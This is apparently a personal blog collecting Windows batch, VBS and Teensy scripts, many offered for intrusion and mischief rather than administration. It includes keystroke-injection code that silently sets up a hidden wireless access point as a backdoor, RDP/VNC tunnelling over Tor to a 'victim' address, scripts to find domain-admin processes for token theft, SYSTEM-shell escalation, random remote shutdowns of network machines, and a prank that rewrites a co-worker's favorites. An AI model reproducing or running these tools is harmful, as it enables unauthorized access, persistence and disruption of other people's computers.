Friday, March 23, 2012

Change the URLs in all .url files in the favorites folder

I wanted to play a joke on a co-worker and replace all the addresses in the .URL files in their favorites with a funnier (to me) address.

Now there's a lot of easier ways to do this, like making a generic .URL file, or just deleting them and downloading some new ones, but I wanted to make it difficult and parse through all the files and leave everything in tact just change the address in the URL= line.

-=The Script=-

@echo off
setlocal ENABLEDELAYEDEXPANSION
cd "%userprofile%\favorites"

for /f "tokens=* delims=" %%g in ('dir /b ^| find ".url"') do (
    for /f "usebackq delims=" %%a in ("%%g") do (
        set p=%%a
        echo !p!
        set u=!p:~0,4!
        echo !u!
        if /i "!u!" == "URL=" echo URL=http://lemonparty.org >> "%temp%\%%g"
        if /i not "!u!" == "URL=" echo %%a >> "%temp%\%%g"
    )
)
del /f /q *.url
copy /y "%temp%\*.url" *.url
del /f /q "%temp%\*.url"
pause

Download from the internet with a batch file

So occasionally I want to write a script but I'll need it to download something from a website or wherever. Without using 3rd party utilities you're pretty well hosed in the windows world. Except for BITSadmin.

Bitsadmin is very handy for this process, sometimes it doesn't work and spouts out some error about server didn't respond with file size or some such nonsense, but for the most part it's fairly reliable.

-=The Script=-

@echo off
bitsadmin /transfer jobname /download /priority normal http://addreess.com/file.ext "%cd%\whatever.ext"

Batch Ping Scan and Name Resolution

It's not fancy, but if you can't "import" any tools to a windows system this will do a basic job of finding hosts and resolving their names.

Quick, simple, uses nothing but built in components in the windows system.

@echo off
Title Scan
mode con: cols=20 lines=5
echo    Enter Network:
echo [Example 192.168.1]
set /p network=
cls
mode con: cols=60 lines=254
title Scanning Network %network%.0/24
echo Scanning...
for /L %%i in (1,1,255) do ping -n 1 -w 60 %network%.%%i | find /i "reply" >> ~temp1
for /f "tokens=3 delims=: " %%i in (~temp1) do echo %%i >> ~temp2
del /f /q ~temp1 > nul
cls
title Resolving Network %network%.0/24
for /f %%i in (~temp2) do for /f "tokens=2 delims=: " %%g in ('nslookup %%i 2^>nul ^| find /i "name"') do echo %%i %%g
for /f %%i in (~temp2) do for /f "tokens=1 delims=: " %%g in ('nslookup %%i 2^>^&1 ^| find /i "***"') do echo %%i Hostname Lookup Failed
del /f /q ~temp2 > nul
pause

Thursday, March 22, 2012

RDP Over Tor

Привет мои товарищи России

Sometimes I like to use Tor for stuff. Sometimes that stuff is the Remote Desktop Protocol

This requires you have TOR setup and know how to use it and aren't an idiot that thinks just turning on TOR will make you invisible to the world.

You'll also need a handy little program called socat:
----------
UPDATE
----------
Since this is the most popular post I have (I'm looking at you Russia) I figured I'd be a decent guy and find the socat binaries on the web and link to them.
 
Here's the link for Socat:
Socat Binaries For Windows 
(French description on top, scroll to the bottom for English)
Respect to the Blog of the Nice Kiwi.

Extract that into one folder and add script from below.
Toss until evenly coated.

You'll need to adjust path for where TOR is installed for you.

-=The Script=-

@echo off
set c=%random%
if %c% GTR 15 goto less
if %c% LEQ 15 goto rainbow
:less
set c=%c:~1%
if %c% LEQ 15 goto rainbow
if %c% GTR 15 goto less
:rainbow
if %c% EQU 1 color 01
if %c% EQU 2 color 0A
if %c% EQU 3 color 03
if %c% EQU 4 color 04
if %c% EQU 5 color 05
if %c% EQU 6 color 0D
if %c% EQU 7 color 07
if %c% EQU 8 color 0F
if %c% EQU 9 color 09
if %c% EQU 10 color 02
if %c% EQU 11 color 0B
if %c% EQU 12 color 0C
if %c% EQU 13 color 06
if %c% EQU 14 color 0E
if %c% EQU 15 color 09
cls
Title Starting TOR
Echo Connecting to the DarkWebs
start "TOR" /DC:\progra~1\vidali~1\tor\tor.exe
cls
Title Meow~~~
echo ************
echo RDP over TOR
echo ************
echo +Enter Victim Address:
set /p victim=
cls
title Meow~~~ +%victim%
echo +Enter Victim Port:    *default 3389
set /p port=
cls
title Meow~~~ +%victim%:%port%
echo +Enter Local Port to Listen on: *ex: 1234
set /p lport=
cls
title Meow~~~ +%victim%:%port% from 127.0.0.1:%lport%
echo #Give a CTRL+C to bail
echo +Launching MSTSC for you...
start mstsc /V:127.0.0.1:%lport%
echo +Connecting...
socat TCP4-LISTEN:%lport%,fork SOCKS4A:localhost:%victim%:%port%,socksport=9050
exit


***************
*BONUS STAGE*
***************
Same script except I got rid of the auto launch of mstsc and changed RDP to VNC in the text.

-=The Script=-
@echo off
@echo off
set c=%random%
if %c% GTR 15 goto less
if %c% LEQ 15 goto rainbow
:less
set c=%c:~1%
if %c% LEQ 15 goto rainbow
if %c% GTR 15 goto less
:rainbow
if %c% EQU 1 color 01
if %c% EQU 2 color 0A
if %c% EQU 3 color 03
if %c% EQU 4 color 04
if %c% EQU 5 color 05
if %c% EQU 6 color 0D
if %c% EQU 7 color 07
if %c% EQU 8 color 0F
if %c% EQU 9 color 09
if %c% EQU 10 color 02
if %c% EQU 11 color 0B
if %c% EQU 12 color 0C
if %c% EQU 13 color 06
if %c% EQU 14 color 0E
if %c% EQU 15 color 09
cls
Title Starting TOR
Echo Connecting to the DarkWebs
start "TOR" /DC:\progra~1\vidali~1\tor\tor.exe
cls
Title Meow~~~
echo ************
echo VNC over TOR
echo ************
echo +Enter Victim Address:
set /p victim=
cls
title Meow~~~ +%victim%
echo +Enter Victim Port:    *default 5900
set /p port=
cls
title Meow~~~ +%victim%:%port%
echo +Enter Local Port to Listen on: *ex: 1234
set /p lport=
cls
title Meow~~~ +%victim%:%port% from 127.0.0.1:%lport%
echo Connect VNC to 127.0.0.1:%lport%
echo +Connecting...
socat TCP4-LISTEN:%lport%,fork SOCKS4A:localhost:%victim%:%port%,socksport=9050
exit


Change your ports and any program that can run through SOCKS can be run through TOR with these scripts and socat.

Arduino Win7 wireless backdoor.

I picked up a Teensy a while back. If you don't have one and you like either causing trouble or penetration testing I HIGHLY recommend you pick one up.

Anyways, I learned about an interesting feature in windows 7 that (if your wireless card supports it) allows you to create a software AP. So then you can connect to that and share your internet connection... or set it up without a users knowledge, install a bind shell, and have a very hard to find wireless backdoor.

Now there are a few things that I really like about this.
1) The computer it's setup on doesn't pick up the new wireless network. So while their computer is now broadcasting a new network, when they scan for available wireless networks, they don't pick it up.
2) There's no notifications to the user.
3) You can script it.
4) It'll drive some poor admin NUTS trying to find the physical access point some stupid end user plugged in somewhere.

So I set about to make my teensy emulate a keyboard and type out all the commands I wanted then dump a bind shell and activate it.

Here's the code to start cmd.exe as administrator (this assumes UAC is enabled), and enter the commands to enable a new soft ap with ssid Blakhal0 and wpa passphrase Iamsupercool.

void setup() { }
void loop(){
  delay(10000);
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  delay(500);
  Keyboard.print("cmd");
  delay(500);
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1000);
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_Y);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now(); 
  delay(1000);
  Keyboard.print("netsh wlan set hostednetwork mode=allow ssid=Blakhal0 key=Iamsupercool");
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1000);
  Keyboard.print("netsh wlan start hostednetwork");
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1000); 
  Keyboard.print("exit");
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(999999);
}

There's a lot of other people that are way better at writing code for the arduino more compact than I am. I THINK over at Iron Geeks website there's some space saving functions that you can mangle into your code to cut down the bloat.
www.irongeek.com

You can figure out the dropping the bind shell on your own you lazy mooches.
Having it drop the bind shell is left as an exercise to the reader.

I did send this to Dave Kennedy (ReL1K) www.secmaniac.com to integrate into SET as an arduino payload but I've yet to see it as an option. Or maybe I just didn't see it in the change log, I mean it's not like he releases 15,000 revisions (a day) when he gets on a roll. And I haven't had the occasion to need to use SET in a while.

So for those playing at home the batch equivalent of this is pretty easy to figure out since, well, it's right in there. Of course you're missing the need to run as administrator part, but if you happen to pop a shell on a windows 7 box with wireless you can give this a try or if you're psexec'd in. Again it'll only work if the wireless card will support it and you have to be administrator or better. Most of the wireless cards I've tested it with worked out of the box or just needed a firmware update. I haven't found any (out of the 5 I've tested) that flat out wouldn't work.

-=The Script=-

@echo off
netsh wlan set hostednetwork mode=allow ssid=Blakhal0 key=Iamsupercool
netsh wlan start hostednetwork
exit

Services Report

I was checking for weaknesses in services on a remote machine one time but going through them one at a time was annoying and I really wanted to just have a text file with all the info I could transfer off the machine to peruse at my leisure. So I made this. It enumerates all the services and then does a sc query on them and dumps the output to a text file.

It could be improved by doing a cacls report on the Binary_Path_Name of the service to see if there's write / modify access to the folder. Feel free to improve on it.

-=The Script=-

@echo off
sc query state= all | find /i "Service_Name:" >> test.txt
for /f "tokens=2* delims= " %%a in (test.txt) do echo %%a %%b>> test2.txt
for /f "tokens=* delims=" %%x in (test2.txt) do (
call :sub1 %%x)
goto :next

:sub1
if %1'==' goto :eof
echo %*>> clean.txt
goto :eof



:next
for /f "tokens=* delims=" %%v in (clean.txt) do sc qc "%%v" >> finally.txt
del /f /q test.txt
del /f /q test2.txt
del /f /q clean.txt
exit

Find Processes Running as a Domain Admin

You'll need a user account that's admin on all the local machines to run this one.

Searches all running processes on all computers reported from net view for a username that matches one from the file names.txt (you make that yourself). I suppose this could be augmented with another script to dump the net localgroup administrators /domain and parse that out into the names.txt file. I'll leave that as an exercise to the reader.

Useful for finding a token to steal or maybe a process to inject into.

-=The Script=-

@echo off
echo Enter Username
set /p user=
echo Enter Password
set /p password=
net view >> comp.txt
Echo Parsing Results...
for /f "tokens=1" %%i in (comp.txt) do echo %%i >> comp2.txt
for /f "delims=\" %%i in (comp2.txt) do echo %%i >> ips.txt
del /f /q comp.txt
del /f /q comp2.txt
FOR /F %%i in (ips.txt) DO @echo [+] %%i && @tasklist /V /S %%i /U %user% /P %password% 2>NUL > output.txt && FOR /F %%n in (names.txt) DO @type output.txt | findstr %%n > NUL && echo [!] %%n was found running a process on %%i && pause

Start cmd.exe as system in 1 minute

Not sure exactly why I wrote this one but it's come in handy a few times. For those times when Admin rights just aren't enough...

Starts cmd.exe running as system from the AT task scheduler one minute from the time the script is run.

-=The Script=-

@echo off
set tm=%time:~3,2%
set hr=%time:~0,2%
if "%hr:~0,1%"==" " set hr=0%time:~1,1%
set tens=%time:~3,1%
set ones=%time:~4,1%
echo %tm%
echo %tens%
echo %ones%
if %ones% == 0 set bt=1
if %ones% == 1 set bt=2
if %ones% == 2 set bt=3
if %ones% == 3 set bt=4
if %ones% == 4 set bt=5
if %ones% == 5 set bt=6
if %ones% == 6 set bt=7
if %ones% == 7 set bt=8
if %ones% == 8 set bt=9
if %ones% == 9 set goto jmpten
at %hr%:%tens%%bt% /interactive cmd.exe
exit

:jmpten
if %tens% == 0 set btt=1
if %tens% == 1 set btt=2
if %tens% == 2 set btt=3
if %tens% == 3 set btt=4
if %tens% == 4 set btt=5
if %tens% == 5 set btt=6
if %tens% == 6 set btt=7
if %tens% == 7 set btt=8
if %tens% == 8 set btt=9
if %tens% == 9 set goto badend
at %hr%:%btt%%bt% /interactive cmd.exe
exit

:badend
echo I'm lazy and didn't want to code this extra bit for the event of an hour change
echo Just wait a minute and run it again.
pause > nul

Ghetto As All Get Out Port Scanner

You're stuck in a network without internet access, you don't have a port scanner with you, can't leave to get one, no other options..... what do you do? WHAT DO YOU DO????

Thus was born the Ghetto as All Get Out Port Scanner. What an ugly bit of code.

This was being built into a larger script so there's some stuff missing here obviously. The File ~temp2 would have the list of  ip addresses. You would need to change the port (9100 in this case) or assign a new variable to handle running through the ports you wanted to check.

Of course you need telnet installed so this isn't windows vista / 7 compatible.

-=The Script=-

@echo off
for /f %%i in (~temp2) do (
    start /min telnet %%i 9100
    ping -n 5 127.0.0.1 > nul
    netstat -n | find /i "%%i:9100" | find /i "Established" && echo %%i >> up.txt
    taskkill /f /IM telnet.exe
)
exit

Make a list of who is currently logged on to all computers

I wanted to start keeping a running sheet on who was logged in where so I wrote this guy up. Dumps a list from net view and parses it out then does a for loop to run a wmic command to see who's actively logged on to a computer.

-=The Script=-

@echo off
if exist C:\list2.txt del /f /q C:\list2.txt
net view >> C:\list.txt
for /F "skip=3 tokens=1" %%c IN (C:\list.txt) DO echo %%c >> c:\parsed0.txt
for /f %%G in (C:\parsed0.txt) do if NOT %%G==The echo %%G >> C:\parsed1.txt
for /F "delims=\\ tokens=1" %%g IN (C:\parsed1.txt) DO echo %%g >> C:\list2.txt
del /f /q C:\parsed0.txt > nul
del /f /q C:\parsed1.txt > nul
del /f /q C:\list.txt
echo List Generated
for /f %%i in (C:\list2.txt) do (
    for /f "skip=1" %%v in ('wmic /failfast:2000 /node:%%i computersystem get username') do (
        for /f "tokens=2 delims=\" %%c in ("%%v") do (
            for /f "tokens=3,4" %%f in ('net user %%c /domain ^|find /i "Full Name"') do echo %%i %%v %%f %%g >> C:\whosthere.txt
            )
        )
    )
)
echo Done.
del /f /q C:\list2.txt
Pause > nul

Retrieve logon name from Human Name

I hate it when I can't do something in pure batch. But, sometimes you just gotta bite the bullet and use another language. Here's a (choke, vomit) VBS script to return the logon name given a users human name.

And right now all of you that are saying "well that's retarded their username is just first initial last name" well not everyone rolls like that. Sometimes users get assigned random ass strings as their logon names and it gets pretty freaking annoying having to connect to the DC, find the user, look up their logon name.

You'll need to modify the LDAP address in the second to last part.

Now that I think about this I may have swiped this from somewhere else, I don't remember. If so sorry about not giving credit where credit is due...

-=The Script=-

On Error Resume Next

Const ADS_SCOPE_SUBTREE = 2

strAnswer = InputBox("Please enter in Display Name for User you want Logon Name for:", _
    "Logon Name")

Set objConnection = CreateObject("ADODB.Connection")
Set objCommand =   CreateObject("ADODB.Command")
objConnection.Provider = "ADsDSOObject"
objConnection.Open "Active Directory Provider"
Set objCommand.ActiveConnection = objConnection

objCommand.Properties("Page Size") = 1000
objCommand.Properties("Searchscope") = ADS_SCOPE_SUBTREE

objCommand.CommandText = _
    "SELECT sAMAccountName FROM 'LDAP://dc=ACME,dc=local' WHERE objectCategory='user' " & _
        "AND displayName = '" & strAnswer & "'"
Set objRecordSet = objCommand.Execute

objRecordSet.MoveFirst
Do Until objRecordSet.EOF
    Wscript.Echo objRecordSet.Fields("sAMAccountName").Value
    objRecordSet.MoveNext
Loop

Now that I think about it, I think I can do this in batch... I'll update this if I get time to do it.

Change IP Script

Got tired of all the clicking and right clicking to change my interface address one day while setting up a bunch of equipment that lived in different subnets.

-=The Script=-


@echo off
title Set IP
echo Which Interface?
netsh interface show interface
set /p int=
cls
echo Interface %int%
Echo Static (s) or DHCP (d)
set /p con=
if %con%==s goto setip
if %con%==d goto dhcp

:setip
cls
echo Interface %int%
Echo Enter IP Address
set /p ipadd=
echo Enter Subnet Mask
set /p subnet=
echo Enter Default Gateway
set /p defgat=
echo Do you want to set DNS servers also? (y/n)
set /p ans=
if %ans%==y goto sdns
if %ans%==n echo DNS servers will not be set.
Echo Setting IP Address...
netsh interface ip set address "%int%" static %ipadd% %subnet% %defgat% 1
pause
exit

:sdns
cls
echo DNS Server Setup
echo Enter the IP address of the first dns server
set /p one=
echo Enter the IP address of the second dns server
set /p two=
echo Adding DNS 1...
netsh interface ip add dns "%int%" %one%
echo Adding DNS 2...
netsh interface ip add dns "%int%" %two%
Echo Setting IP Address...
netsh interface ip set address "%int%" static %ipadd% %subnet% %defgat% 1
exit

:dhcp
cls
Echo Interface %int%
echo Setting Interface to DHCP...
netsh interface ip set address "%int%" dhcp
pause
exit

Random Remote Shutdown

Old script I wrote up one day while thinking about how to best randomly annoy an admin. I never finished the full plan for this, maybe someday. Anyways what it does is dumps a list of the current computers from net view, parses it out. It generates a random number with the %random% variable 2 times, then checks how many items are in the list generated by net view + parsing and checks if the poorbastard variable is less than the number of items in the list, if not it removes the first number from the poorbastard variable then rechecks until it's less or equal to the items in the list. Then issues a remote shutdown command to that computer. Obviously you need admin rights on the remote computer for this to function.

-=The Script=-

@echo off
if exist C:\list2.txt del /f /q C:\list2.txt
net view >> C:\list.txt
for /F "skip=3 tokens=1" %%c IN (C:\list.txt) DO echo %%c >> c:\parsed0.txt
for /f %%G in (C:\parsed0.txt) do if NOT %%G==The echo %%G >> C:\parsed1.txt
for /F "delims=\\ tokens=1" %%g IN (C:\parsed1.txt) DO echo %%g >> C:\list2.txt
del /f /q C:\parsed0.txt > nul
del /f /q C:\parsed1.txt > nul
del /f /q C:\list.txt
for /f %%f in ('find /v /c ^"The command completed successfully.^" ^< C:\list2.txt') do set /a V=%%f
set /a poorbastard=%random%+%random%
echo %poorbastard%
if %poorbastard% LEQ %v% goto kill
if %poorbastard% GTR %v% goto minus50dkp
:minus50dkp
set poorbastard=%poorbastard:~1%
if %poorbastard% LEQ %v% goto kill
if %poorbastard% GTR %v% goto minus50dkp
:kill
setlocal ENABLEDELAYEDEXPANSION
set /a n=1
for /f %%a in (C:\list2.txt) do (
if /I !n! equ %poorbastard% set saygoodnight=%%a
set /a n=!n! + 1
)
echo %poorbastard%
echo %saygoodnight%
shutdown -r -m \\%saygoodnight% -t 00 -c "LEEEEEEEEEEROOOOOOOOY jenkins!!!!!!"
set %saygoodnight%=
set %poorbastard%=
set %v%=
pause

Find domain users who changed their passwords today

Wrote this one up just to see if I could. Thought it might make for a good post exploit drop in case you wanted to monitor which users changed their passwords, maybe have it trigger a fresh dump of the domain hashes and mail them to you or post them somewhere. Whatever.

Spits out some errors about user names not found sometimes but it seems to get the job done.

-=The Script=-

@echo off
Echo +Getting User List

for /f "tokens=1,2,3 skip=6" %%a in ('net user /domain') do echo %%a >> C:\people.txt && echo %%b >> C:\people.txt && echo %%c >> C:\people.txt

Echo +Cleaning User List

for /f "tokens=*" %%d in (C:\people.txt) do if not "%%d" == "ECHO is on." if not "%%d" == "ECHO is off." if not "%%d" == "The  " if not "%%d" == "command  " if not "%%d" == "completed " echo %%d >> C:\cleanpeople.txt

del /f /q C:\people.txt

Echo +Setting Time Variables

if 0 == %date:~4,1% set mn=%date:~5,1%
if not 0 == %date:~4,1% set mn=%date:~4,2%

if 0 == %date:~7,1% set dy=%date:~8,1%
if not 0 == %date:~7,1% set dy=%date:~7,2%

set now=%mn%/%dy%/%date:~10,4%

Echo +Finding Active Accounts

for /f %%g in (C:\cleanpeople.txt) do for /f "tokens=3" %%h in ('net user %%g /domain ^| find /i "Account Active"') do if %%h == Yes echo %%g >> C:\activecleanpeople.txt

del /f /q C:\cleanpeople.txt

cls

Echo +Finding Users Who Changed Their Passords Today

for /f %%e in (C:\activecleanpeople.txt) do for /f "tokens=4" %%f in ('net user %%e /domain ^| find /i "Password last set"') do if %%f == %now% echo %%e changed their password today

del /f /q C:\activecleanpeople.txt

Echo Finished.
pause > nul